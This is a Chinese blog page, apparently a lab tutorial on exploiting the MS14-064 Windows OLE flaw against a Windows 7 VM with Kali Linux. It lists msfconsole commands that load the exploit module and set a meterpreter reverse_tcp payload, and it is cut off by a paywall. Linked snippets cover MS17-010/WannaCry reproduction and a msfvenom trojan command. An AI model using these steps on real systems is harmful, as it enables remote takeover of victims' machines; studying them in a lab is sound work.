kali linux 2.0入侵windiws7系统 ------ms14-064漏洞

最新推荐文章于 2025-03-03 17:45:02 发布
最新推荐文章于 2025-03-03 17:45:02 发布
阅读量3.2k 收藏 9
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_30508729/article/details/98684924
版权
本文详细介绍了如何利用Kali Linux和ms14-064 OLE远程代码执行漏洞来入侵Windows 7系统。通过Metasploit Framework的exploit/windows/browser/ms14_064_ole_code_execution模块,攻击者可以在目标系统上执行任意代码。步骤包括设置payload、配置参数,并在Windows 7系统中触发漏洞,最终在Kali Linux中建立反弹shell。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

漏洞介绍:

Microsoft Windows OLE远程代码执行漏洞,OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术,

远程攻击者利用此漏洞通过构造的网站执行任意代码,影响Win95+IE3 – Win10+IE11全版本...

metasploit里已经加入了此漏洞的利用模块 :exploit/windows/browser/ms14_064_ole_code_execution

1.所需工具:kali linux系统 ,windows7系统 

2.在kali linux开启msfconsole

step1:命令:search ms14-064

命令:use exploit windows/browser/ms14-064-ole-code-excution

命令:show payloads

命令:set payload windows/meterpreter/reverse_tcp

命令:set ALLOWPOWERSHELLPROMPT true                   //

因为msf中自带的漏洞利用exp调用的是 powershell,

所以msf(Metasploit Framework)中的exp代码只对安装powershell的系统生效。win7系统安装自带powershell,

所以我们这里测试受害的机器为windows7 32位.

命令:show options

命令:set srvhost 本

最低0.47元/天 解锁文章
02be55f
关注
[系统安全] 二十六.WannaCry勒索病毒分析 (2)MS17-010漏洞利用及蠕虫解析
杨秀璋的专栏
03-01 9101
作者前文采用Github资源实现永恒之蓝漏洞加载WannaCry勒索病毒,并实现对Win7文件加密的过程,但过程较为复杂,为什么不直接利用永恒之蓝呢?所以,这篇文章将直接分享MSF利用MS17-010漏洞进行反弹Shell,再上传勒索病毒进行实验复现,并详细讲解WannaCry勒索病毒的原理。基础性文章,希望对您有所帮助。
[网络安全自学篇] 六十八.WannaCry勒索病毒复现及分析(二)MS17-010利用及病毒解析
热门推荐
杨秀璋的专栏
04-20 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了通过Python利用永恒之蓝漏洞加载WannaCry勒索病毒,并实现对Win7文件加密的过程,但过程较为复杂,为什么不直接利用永恒之蓝呢?所以,这篇文章将直接分享MSF利用MS17-010漏洞进行反弹Shell,再上传勒索病毒进行实验复现,并详细讲解WannaCry勒索病毒的原理。基础性文章,希望对您有所帮助。
渗透攻击之ms14-064漏洞利用实验
wylululu的博客
01-07 8636
ms14-064简介 Microsoft Windows OLE远程代码执行漏洞,OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术,远程攻击者利用漏洞通过构造的网站执行任意代码,影响Win95+IE3 –Win10+IE11全版本。 实验步骤: 第一步:打开已安装好的kaili虚拟机系统,显示界面: 第二步:单击打开metasploit framework或者点击左上角应用程序&...
MS14-064 漏洞测试入侵win7
aozhuo4755的博客
04-25 1980
Microsoft Windows OLE远程代码执行漏洞,OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术, 远程攻击者利用漏洞通过构造的网站执行任意代码,影响Win95+IE3 – Win10+IE11全版本... metasploit里已经加入了此漏洞利用模块 :exploit/windows/browser/ms14_064_ole_code_executi...
如何使用kali入侵(渗透)一台windows
最新发布
baimao__Ch的博客
03-03 578
工具:一台带有kali linux系统的虚拟机,一个聪明的大脑开始前我们先需要将kali虚拟机改为桥接网络模式,否则会导致渗透失败1.打开虚拟机,点击虚拟机2.点击设置3.点击网络适配器,看左边点击桥接模式,点击确定即可好了,现在我们就要正式渗透一个windows系统啦,兴不兴奋?1.打开虚拟机2.打开终端,输入sudo su进入root用户权限3.进入root权限后输入ifconfig查看本机ip地址,eth0旁边192开头的为本机ip。
kali之***win7系统2
weixin_33708432的博客
06-29 209
Metasploit是一款开源的安全漏洞检测工具。它可以帮助用户识别安全问题,验证漏洞的缓解措施,并对某些软件进行安全性评估,提供真正的安全风险情报Metasploit软件为它的基础功能提供了多个用户接口,包括终端、命令行和图形化界面等启动Metasploit服务运行Armitage工具打开定义MSF探测主机探测到的主机确定操作系统 转载于:https://blog...
针对ms14-064模块漏洞的网络渗透实战
skjie的博客
01-11 1076
针对ms14-064模块漏洞的网络渗透实战
Kali下metasploit渗透Windows7
如诗如画
06-16 3210
Kali下metasploit渗透Windows7/教程详细/ 靶场环境 操作系统 Kali_Linux IP:172.17.201.44 靶机 windows7 IP:172.17.201.12 使用工具 metasploit nmap 正文 1.首先使用namp对靶机进行扫描,确定445端口是否开启 2.打开metasploit搜索ms17-010 1. msfconsole 2. search ms17-010 3.选择漏洞验证扫描工具并设置参数 1. use auxiliary/ad
kali利用ms17-010漏洞实现win7系统入侵
2301_77296801的博客
10-12 2027
MS17-010漏洞是在2017年5月份由NSA泄露出来的一个漏洞,该漏洞影响了微软Windows操作系统中的SMBv1协议,攻击者可通过该漏洞远程执行代码,从而控制目标系统。此漏洞被称为“永恒之蓝”(EternalBlue)。攻击者可以利用漏洞构造恶意SMB数据包,直接向目标系统发送攻击代码,从而远程控制目标系统。攻击者可以利用漏洞传播恶意代码,建立僵尸网络,进行勒索软件攻击等,下面进行该攻击的教学。在这里我们以Windows虚拟机作为漏洞靶机,在Kali Linux中运行攻击命令。1、点击。
利用ms17-010实现系统入侵
lwh_0330的博客
10-11 177
1、创建虚拟网卡vmnet4,设置IP网段为192.168.2.02、更改kali系统的网卡为vment4。3、登录kali系统,取得root的权限。6、配置win 7kali 的IP地址。1、设置win 7的网卡为vmnet4。8、利用hashdump实现密码的破解。1、实现kali系统win 7互通。4、配置kali系统的静态IP地址。3、搜索ms17-010漏洞的名称。2、配置win 7的静态IP地址。7、查看kali系统的IP地址。10、新建终端,实现远程登录。5、卸载补丁,重启电脑。
kali 里寻找widows的ms17_010漏洞,并且利用漏洞进行攻击,获得windows 7 的管理员权限
net的博客
01-10 1007
永恒之蓝漏洞攻击一、实验环境Windows7机器作为靶机(192.168.180.134)存在永恒之蓝的漏洞kali linux2022机器作为攻击机(192.168.180.130)验证条件:攻击机ping靶机,ping成功才可进行下一步。(ctrl+z,才会停止)若没有ping成功,可能是靶机防火墙没关的问题,关闭就行。二、实验步骤首先,输入“msfconsole”进入metasploit(MSF)工具控制台,(界面随机)1、先去在msf中找一下msf的脚本。
kali攻击blue(win7)靶机
weixin_50339832的博客
12-28 4583
目录1.找到目标靶机2.进行漏洞探测,识别服务3.漏洞识别与发现1)探测永恒之蓝漏洞2)进行漏洞利用,获取权限3)在目标靶机写入一个文件 配置blue IP地址(需要和kali处于同一网段,但最后一位不相同) KALI的主机IP地址为:192.168.179.128(用root) 在KALI中ping通blue的地址,出现time即成功 1.找到目标靶机 nmap -p 445 192.168.179.0/24 Nmap scan report for 192.168.179.1 Host is up (
MS14-064 漏洞复现
p_utao的博客
03-05 883
背景 Microsoft Windows OLE远程代码执行漏洞,OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术,远程攻击者利用漏洞通过构造的网站执行任意代码,影响Win95+IE3 – Win10+IE11全版本… 模块:exploit/windows/browser/ms14_064_ole_code_execution 复现 系统 IP linux 10.7.10.43 win7 10.7.10.49 msf6 > search ms14-064
linux打补丁win7,微软为Windows 7Windows Server 2008释出Meltdown漏洞补丁
weixin_29751415的博客
05-13 168
微软在周五发布了面向64位版本的Windows 7Windows Server 2008 R2安全更新。安全更新-KB4100480解决了本周早些时候由瑞典安全专家发现的安全漏洞。根据Ulf Frisk的说法,微软2018年1月的Meltdown补丁(适用于CVE-2017-5754)允许任何应用程序从内核内存中提取或写入内容。补丁用意是保护内核内存,防止机密信息泄露,结果是内核内存的漏洞反而更...
ms14_064漏洞别IE打开链接执行远控木马
sky
06-18 1731
ms14_064漏洞别IE打开链接执行远控木马 漏洞危及版本:win7/ xp 原文地址:http://wobushi.cn/  本人是将视频教程转换成了文字教程 1生成远控小马详见“ngrok配合msf生成木马” 2.将木马上传至hsf文件服务器复制链接 3.打开metasploit root@kali:~#msfconsole msf> useexploit/wi
kali-linux利用Metasploit操控win7系统
qq_42877870的博客
04-05 1947
准备一台windows7系统的虚拟机作为靶机(我用的靶机地址为192.168.1.9) 一台装有kali-linux的虚拟机(我的kali ip地址为192.168.1.10) 2.kali中生成被控制端(通过msfvenom生成木马) Kali终端输入: msfvenom -p windows/meterpreter/reverse_tcp lhost=192...
MS14_064 漏洞利用与安全加固
theRavensea
03-18 2090
利用漏洞则需要进行用户交互。通过发送电子邮件信息给本地登录用户的攻击要想得逞,需要该用户打开包含经特殊设计的 OLE 对象的附件。许多不同类型的附带文档都可能包含受影响的 OLE 对象,所有 Office 文件类型以及其他一些第三方文件类型都可能包含恶意 OLE 对象。在电子邮件攻击情形中,攻击者可以通过向用户发送经特殊设计的文件并诱使用户打开该文件来利用漏洞。在基于 Web 的攻击情形中,攻击者必须拥有一个网站,其中包含用来试图利用漏洞的 Office 文件。另外,受到破坏的网站以及接受或宿主用户
漏洞复现:MS14-064 OLE远程代码执行漏洞
dingbai2663的博客
09-23 2937
MS14-064OLE远程代码执行漏洞 攻击机:Kali Linux 2019 靶机:Windows 7 x64、x32 攻击步骤: 1.打开攻击机Kali Linux 2019系统和靶机Windows 7系统 2.确定IP地址后,Kali Linux开启msf模块,准备攻击测试 3.在这里我们使用MS14-064OL...
MS14-064(OLE远程代码执行漏洞复现)
Martin-share的博客
02-11 2510
MS14-064(OLE远程代码执行漏洞复现)
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值